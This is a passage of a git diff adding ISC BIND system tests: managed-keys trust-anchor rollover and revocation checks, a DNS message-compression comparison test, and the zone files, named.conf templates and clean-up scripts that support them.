since" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke all keys, confirm roll to insecure ($n)" +ret=0 +$SETTIME -D now -K ns1 "$original" > /dev/null +$SETTIME -R now -K ns1 "$standby1" > /dev/null +$SETTIME -R now -K ns1 "$standby2" > /dev/null +mkeys_loadkeys_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# two keys listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both indicate trust revoked +count=$(grep -c "trust revoked" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# both have removal scheduled +count=$(grep -c "remove at" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check for insecure response ($n)" +ret=0 +mkeys_refresh_on 2 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reset the root server ($n)" +ret=0 +$SETTIME -D none -R none -K ns1 "$original" > /dev/null +$SETTIME -D now -K ns1 "$standby1" > /dev/null +$SETTIME -D now -K ns1 "$standby2" > /dev/null +sleep 1 # ensure modification time changes +$SIGNER -Sg -K ns1 -N unixtime -o . ns1/root.db > /dev/null 2>/dev/null +copy_setports ns1/named2.conf.in ns1/named.conf +rm -f ns1/root.db.signed.jnl +mkeys_reconfig_on 1 || ret=1 +mkeys_reload_on 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "reinitialize trust anchors" +stop_server --use-rndc --port "${CONTROLPORT}" ns2 +rm -f ns2/managed-keys.bind* +nextpart ns2/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns2 + +n=$((n+1)) +echo_i "check positive validation ($n)" +ret=0 +wait_for_log 20 "Returned from key fetch in keyfetch_done()" ns2/named.run || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "revoke key with bad signature, check revocation is ignored ($n)" +ret=0 +revoked=$($REVOKE -K ns1 "$original") +rkeyid=$(keyfile_to_key_id "$revoked") +rm -f ns1/root.db.signed.jnl +# We need to activate at least one valid DNSKEY to prevent dnssec-signzone from +# failing. Alternatively, we could use -P to disable post-sign verification, +# but we actually do want post-sign verification to happen to ensure the zone +# is correct before we break it on purpose. +$SETTIME -R none -D none -K ns1 "$standby1" > /dev/null +$SIGNER -Sg -K ns1 -N unixtime -O full -o . -f signer.out.$n ns1/root.db > /dev/null 2>/dev/null +cp -f ns1/root.db.signed ns1/root.db.tmp +BADSIG="SVn2tLDzpNX2rxR4xRceiCsiTqcWNKh7NQ0EQfCrVzp9WEmLw60sQ5kP xGk4FS/xSKfh89hO2O/H20Bzp0lMdtr2tKy8IMdU/mBZxQf2PXhUWRkg V2buVBKugTiOPTJSnaqYCN3rSfV1o7NtC1VNHKKK/D5g6bpDehdn5Gaq kpBhN+MSCCh9OZP2IT20luS1ARXxLlvuSVXJ3JYuuhTsQXUbX/SQpNoB Lo6ahCE55szJnmAxZEbb2KOVnSlZRA6ZBHDhdtO0S4OkvcmTutvcVV+7 w53CbKdaXhirvHIh0mZXmYk2PbPLDY7PU9wSH40UiWPOB9f00wwn6hUe uEQ1Qg==" +# Less than a second may have passed since ns1 was started. If we call +# dnssec-signzone immediately, ns1/root.db.signed will not be reloaded by the +# subsequent "rndc reload ." call on platforms which do not set the +# "nanoseconds" field of isc_time_t, due to zone load time being seemingly +# equal to master file modification time. +sleep 1 +sed -e "/ $rkeyid \./s, \. .*$, . $BADSIG," signer.out.$n > ns1/root.db.signed +mkeys_reload_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# one key listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'keyid:' count ($count) != 1"; ret=1; } +# it's the original key id +count=$(grep -c "keyid: $originalid" rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'keyid: $originalid' count ($count) != 1"; ret=1; } +# not revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 0 ] || { echo_i "'REVOKE' count ($count) != 0"; ret=1; } +# trust is still current +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'trust' count != 1"; ret=1; } +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'trusted since' count != 1"; ret=1; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check validation fails with bad DNSKEY rrset ($n)" +ret=0 +mkeys_flush_on 2 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "restore DNSKEY rrset, check validation succeeds again ($n)" +ret=0 +rm -f "${revoked}".key "${revoked}".private +rm -f ns1/root.db.signed.jnl +$SETTIME -D none -R none -K ns1 "$original" > /dev/null +$SETTIME -D now -K ns1 "$standby1" > /dev/null +# Less than a second may have passed since ns1 was started. If we call +# dnssec-signzone immediately, ns1/root.db.signed will not be reloaded by the +# subsequent "rndc reload ." call on platforms which do not set the +# "nanoseconds" field of isc_time_t, due to zone load time being seemingly +# equal to master file modification time. +sleep 1 +$SIGNER -Sg -K ns1 -N unixtime -o . ns1/root.db > /dev/null 2>/dev/null +mkeys_reload_on 1 || ret=1 +mkeys_flush_on 2 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +if [ ! "$CYGWIN" ]; then + n=$((n+1)) + echo_i "reset the root server with no keys, check for minimal update ($n)" + ret=0 + # Refresh keys first to prevent previous checks from influencing this one. + # Note that we might still get occasional false negatives on some really slow + # machines, when $t1 equals $t2 due to the time elapsed between "rndc + # managed-keys status" calls being equal to the normal active refresh period + # (as calculated per rules listed in RFC 5011 section 2.3) minus an "hour" (as + # set using -T mkeytimers). + mkeys_refresh_on 2 || ret=1 + mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 + t1=$(grep 'next refresh:' rndc.out.1.$n) || true + stop_server --use-rndc --port "${CONTROLPORT}" ns1 + rm -f ns1/root.db.signed.jnl + cp ns1/root.db ns1/root.db.signed + nextpart ns1/named.run > /dev/null + start_server --noclean --restart --port "${PORT}" ns1 + wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 + mkeys_refresh_on 2 || ret=1 + mkeys_status_on 2 > rndc.out.2.$n 2>&1 || ret=1 + # one key listed + count=$(grep -c "keyid: " rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + # it's the original key id + count=$(grep -c "keyid: $originalid" rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + # not revoked + count=$(grep -c "REVOKE" rndc.out.2.$n) || true + [ "$count" -eq 0 ] || ret=1 + # trust is still current + count=$(grep -c "trust" rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + count=$(grep -c "trusted since" rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + t2=$(grep 'next refresh:' rndc.out.2.$n) || true + [ "$t1" = "$t2" ] && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +fi + +n=$((n+1)) +echo_i "reset the root server with no signatures, check for minimal update ($n)" +ret=0 +# Refresh keys first to prevent previous checks from influencing this one +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 +t1=$(grep 'next refresh:' rndc.out.1.$n) || true +stop_server --use-rndc --port "${CONTROLPORT}" ns1 +rm -f ns1/root.db.signed.jnl +cat ns1/K*.key >> ns1/root.db.signed +nextpart ns1/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns1 +wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent minimal update from resetting it to the same timestamp. +sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.2.$n 2>&1 || ret=1 +# one key listed +count=$(grep -c "keyid: " rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +# it's the original key id +count=$(grep -c "keyid: $originalid" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +# not revoked +count=$(grep -c "REVOKE" rndc.out.2.$n) || true +[ "$count" -eq 0 ] || ret=1 +# trust is still current +count=$(grep -c "trust" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +count=$(grep -c "trusted since" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +t2=$(grep 'next refresh:' rndc.out.2.$n) || true +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "restore root server, check validation succeeds again ($n)" +ret=0 +rm -f ns1/root.db.signed.jnl +$SIGNER -Sg -K ns1 -N unixtime -o . ns1/root.db > /dev/null 2>/dev/null +mkeys_reload_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that trust-anchor-telemetry queries are logged ($n)" +ret=0 +grep "sending trust-anchor-telemetry query '_ta-[0-9a-f]*/NULL" ns2/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that trust-anchor-telemetry queries are received ($n)" +ret=0 +grep "query '_ta-[0-9a-f][0-9a-f]*/NULL/IN' approved" ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc-managed-keys destroy' ($n)" +ret=0 +rndccmd 10.53.0.2 managed-keys destroy | sed 's/^/ns2 /' | cat_i +mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 +grep "no views with managed keys" rndc.out.1.$n > /dev/null || ret=1 +mkeys_reconfig_on 2 || ret=1 +check_root_trust_anchor_is_present_in_status() { + mkeys_status_on 2 > rndc.out.2.$n 2>&1 || return 1 + grep "name: \." rndc.out.2.$n > /dev/null || return 1 + return 0 +} +retry_quiet 5 check_root_trust_anchor_is_present_in_status || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that trust-anchor-telemetry queries contain the correct key ($n)" +ret=0 +# convert the hexadecimal key from the TAT query into decimal and +# compare against the known key. +tathex=$(grep "query '_ta-[0-9a-f][0-9a-f]*/NULL/IN' approved" ns1/named.run | awk '{print $6; exit 0}' | sed -e 's/(_ta-\([0-9a-f][0-9a-f]*\)):/\1/') || true +tatkey=$($PERL -e 'printf("%d\n", hex(@ARGV[0]));' "$tathex") +realkey=$(rndccmd 10.53.0.2 secroots - | sed -n "s#.*${DEFAULT_ALGORITHM}/\([0-9][0-9]*\) ; .*managed.*#\1#p") +[ "$tatkey" -eq "$realkey" ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check initialization fails if managed-keys can't be created ($n)" +ret=0 +mkeys_secroots_on 4 || ret=1 +grep '; initializing managed' ns4/named.secroots > /dev/null 2>&1 || ret=1 +grep '; managed' ns4/named.secroots > /dev/null 2>&1 && ret=1 +grep '; trusted' ns4/named.secroots > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check failure to contact root servers does not prevent key refreshes after restart ($n)" +ret=0 +# By the time we get here, ns5 should have attempted refreshing its managed +# keys. These attempts should fail as ns1 is configured to REFUSE all queries +# from ns5. Note that named1.args does not contain "-T mkeytimers"; this is to +# ensure key refresh retry will be scheduled to one actual hour after the first +# key refresh failure instead of just a few seconds, in order to prevent races +# between the next scheduled key refresh time and startup time of restarted ns5. +stop_server --use-rndc --port "${CONTROLPORT}" ns5 +nextpart ns5/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns5 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for '.':" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.tld':" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.foo':" ns5/named.run || ret=1 +# ns5/named.run will contain logs from both the old instance and the new +# instance. In order for the test to pass, both must attempt a fetch. +count=$(grep -c "Creating key fetch" ns5/named.run) || true +[ "$count" -lt 2 ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc managed-keys' and islands of trust root unreachable ($n)" +ret=0 +mkeys_sync_on 5 +mkeys_status_on 5 > rndc.out.$n 2>&1 || ret=1 +# there should be three keys listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# three lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# one indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check key refreshes are resumed after root servers become available ($n)" +ret=0 +stop_server --use-rndc --port "${CONTROLPORT}" ns5 +# Prevent previous check from affecting this one +rm -f ns5/managed-keys.bind* +# named2.args adds "-T mkeytimers=2/20/40" to named1.args as we need to wait for +# an "hour" until keys are refreshed again after initial failure +cp ns5/named2.args ns5/named.args +nextpart ns5/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns5 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for '.': failure" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.tld': failure" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.foo': success" ns5/named.run || ret=1 +mkeys_secroots_on 5 || ret=1 +grep '; initializing managed' ns5/named.secroots > /dev/null 2>&1 || ret=1 +# ns1 should still REFUSE queries from ns5, so resolving should be impossible +dig_with_opts +noauth example. @10.53.0.5 txt > dig.out.ns5.a.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns5.a.test$n > /dev/null && ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns5.a.test$n > /dev/null && ret=1 +grep "status: SERVFAIL" dig.out.ns5.a.test$n > /dev/null || ret=1 +# Allow queries from ns5 to ns1 +copy_setports ns1/named3.conf.in ns1/named.conf +rm -f ns1/root.db.signed.jnl +nextpart ns5/named.run > /dev/null +mkeys_reconfig_on 1 || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for '.': success" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.tld': success" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.foo': success" ns5/named.run || ret=1 +mkeys_secroots_on 5 || ret=1 +grep '; managed' ns5/named.secroots > /dev/null || ret=1 +# ns1 should not longer REFUSE queries from ns5, so managed keys should be +# correctly refreshed and resolving should succeed +dig_with_opts +noauth example. @10.53.0.5 txt > dig.out.ns5.b.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns5.b.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns5.b.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns5.b.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reinitialize trust anchors, add unsupported algorithm ($n)" +ret=0 +stop_server --use-rndc --port "${CONTROLPORT}" ns6 +rm -f ns6/managed-keys.bind* +nextpart ns6/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns6 +# log when an unsupported algorithm is encountered during startup +wait_for_log 20 "ignoring initial-key for 'unsupported.': algorithm is unsupported" ns6/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "ignoring unsupported algorithm in managed-keys ($n)" +ret=0 +mkeys_status_on 6 > rndc.out.$n 2>&1 || ret=1 +# there should still be only two keys listed (for . and island.) +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 + +n=$((n+1)) +echo_i "introduce unsupported algorithm rollover in authoritative zone ($n)" +ret=0 +cp ns1/root.db ns1/root.db.orig +ksk=$(cat ns1/managed.key) +zsk=$(cat ns1/zone.key) +cat "ns1/${ksk}.key" "ns1/${zsk}.key" ns1/unsupported.key >> ns1/root.db +grep "\.[[:space:]]*IN[[:space:]]*DNSKEY[[:space:]]*257 3 255" ns1/root.db > /dev/null || ret=1 +$SIGNER -K ns1 -N unixtime -o . ns1/root.db "$ksk" "$zsk" > /dev/null 2>/dev/null || ret=1 +grep "DNSKEY.*257 3 255" ns1/root.db.signed > /dev/null || ret=1 +cp ns1/root.db.orig ns1/root.db +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "ignoring unsupported algorithm in rollover ($n)" +ret=0 +mkeys_reload_on 1 || ret=1 +mkeys_refresh_on 6 || ret=1 +mkeys_status_on 6 > rndc.out.$n 2>&1 || ret=1 +# there should still be only two keys listed (for . and island.) +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# log when an unsupported algorithm is encountered during rollover +wait_for_log 20 "Cannot compute tag for key in zone .: algorithm is unsupported" ns6/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc managed-keys' and views ($n)" +ret=0 +rndccmd 10.53.0.7 managed-keys refresh in view1 > rndc.out.ns7.view1.test$n || ret=1 +grep "refreshing managed keys for 'view1'" rndc.out.ns7.view1.test$n > /dev/null || ret=1 +lines=$(wc -l < rndc.out.ns7.view1.test$n) +[ "$lines" -eq 1 ] || ret=1 +rndccmd 10.53.0.7 managed-keys refresh > rndc.out.ns7.view2.test$n || ret=1 +lines=$(wc -l < rndc.out.ns7.view2.test$n) +grep "refreshing managed keys for 'view1'" rndc.out.ns7.view2.test$n > /dev/null || ret=1 +grep "refreshing managed keys for 'view2'" rndc.out.ns7.view2.test$n > /dev/null || ret=1 +[ "$lines" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc managed-keys' and islands of trust now that root is reachable ($n)" +ret=0 +mkeys_sync_on 5 +mkeys_status_on 5 > rndc.out.$n 2>&1 || ret=1 +# there should be three keys listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# theee lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# three indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/names/clean.sh b/bin/tests/system/names/clean.sh new file mode 100644 index 0000000..1f8371b --- /dev/null +++ b/bin/tests/system/names/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.*.test* +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.pid +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/names/ns1/example.db b/bin/tests/system/names/ns1/example.db new file mode 100644 index 0000000..a3e9f90 --- /dev/null +++ b/bin/tests/system/names/ns1/example.db @@ -0,0 +1,50 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1 +ns1 A 10.53.0.1 +@ MX 0 m1.mail-servers.example. +@ MX 0 m2.mail-servers.example. +@ MX 0 m3.mail-servers.example. +@ MX 0 m4.mail-servers.example. +@ MX 0 m5.mail-servers.example. +@ MX 0 m6.mail-servers.example. +@ MX 0 m7.mail-servers.example. +@ MX 0 m8.mail-servers.example. +@ MX 0 m9.mail-servers.example. +@ MX 0 m10.mail-servers.example. +@ MX 0 m11.mail-servers.example. +@ MX 0 m12.mail-servers.example. +@ MX 0 m13.mail-servers.example. +@ MX 0 m14.mail-servers.example. +@ MX 0 m15.mail-servers.example. +@ MX 0 m16.mail-servers.example. +@ MX 0 m17.mail-servers.example. +@ MX 0 m18.mail-servers.example. +@ MX 0 m19.mail-servers.example. +@ MX 0 m20.mail-servers.example. +@ MX 0 m21.mail-servers.example. +@ MX 0 m22.mail-servers.example. +@ MX 0 m23.mail-servers.example. +@ MX 0 m24.mail-servers.example. +@ MX 0 m25.mail-servers.example. +@ MX 0 m26.mail-servers.example. +@ MX 0 m27.mail-servers.example. +@ MX 0 m28.mail-servers.example. +@ MX 0 m29.mail-servers.example. diff --git a/bin/tests/system/names/ns1/named.conf.in b/bin/tests/system/names/ns1/named.conf.in new file mode 100644 index 0000000..50211bc --- /dev/null +++ b/bin/tests/system/names/ns1/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + + +view compress { + match-clients { 10.53.0.1/32; }; + zone "example" { + type primary; + file "example.db"; + }; +}; + +view nocompress { + match-clients { 10.53.0.2/32; }; + message-compression no; + zone "example" { + type primary; + file "example.db"; + }; +}; diff --git a/bin/tests/system/names/setup.sh b/bin/tests/system/names/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/names/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/names/tests.sh b/bin/tests/system/names/tests.sh new file mode 100644 index 0000000..1718830 --- /dev/null +++ b/bin/tests/system/names/tests.sh @@ -0,0 +1,48 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+nosea +stat +noquest +nocomm +nocmd -p ${PORT}" + +status=0 + +echo_i "Getting message size with compression enabled" +$DIG $DIGOPTS -b 10.53.0.1 @10.53.0.1 mx example > dig.compen.test +COMPEN=`grep ';; MSG SIZE' dig.compen.test |sed -e "s/.*: //g"` +cat dig.compen.test |grep -v ';;' |sort > dig.compen.sorted.test + +echo_i "Getting message size with compression disabled" +$DIG $DIGOPTS -b 10.53.0.2 @10.53.0.1 mx example > dig.compdis.test +COMPDIS=`grep ';; MSG SIZE' dig.compdis.test |sed -e "s/.*: //g"` +cat dig.compdis.test |grep -v ';;' |sort > dig.compdis.sorted.test + +# the compression disabled message should be at least twice as large as with +# compression disabled, but the content should be the same +echo_i "Checking if responses are identical other than in message size" +$DIFF dig.compdis.sorted.test dig.compen.sorted.test >/dev/null +ret=$? +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "Checking if message with compression disabled is significantly larger" +echo_i "Disabled $COMPDIS vs enabled $COMPEN" +val=`expr \( $COMPDIS \* 3 / 2 \) / $COMPEN` +if [ $val -le 1 ]; then + echo_i "failed" + status=`expr $status + 1` +fi; + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/notify/clean.sh b/bin/tests/system/notify/clean.sh new file mode 100644 index 0000000..3e18850 --- /dev/null +++ b/bin/tests/system/notify/clean.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f */named.conf +rm -f */named.memstats +rm -f */named.port +rm -f */named.run */named.run.prev +rm -f awk.out.ns?.test* +rm -f dig.out.?.ns5.test* +rm -f dig.out.ns2.test* +rm -f dig.out.ns3.test* +rm -f dig.out.ns4.test* +rm -f log.out +rm -f ns*/managed-keys.bind* ns*/*.mkeys* +rm -f ns*/named.lock +rm -f ns2/example.db +rm -f ns2/x21.db* +rm -f ns3/example.bk +rm -f ns4/x21.bk* +rm -f ns5/x21.bk-b +rm -f ns5/x21.bk-b.jnl +rm -f ns5/x21.bk-c +rm -f ns5/x21.bk-c.jnl +rm -f ns5/x21.db.jnl +rm -f tmp diff --git a/bin/tests/system/notify/ns1/named.conf.in b/bin/tests/system/notify/ns1/named.conf.in new file mode 100644 index 0000000..eb079c9 --- /dev/null +++ b/bin/tests/system/notify/ns1/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff 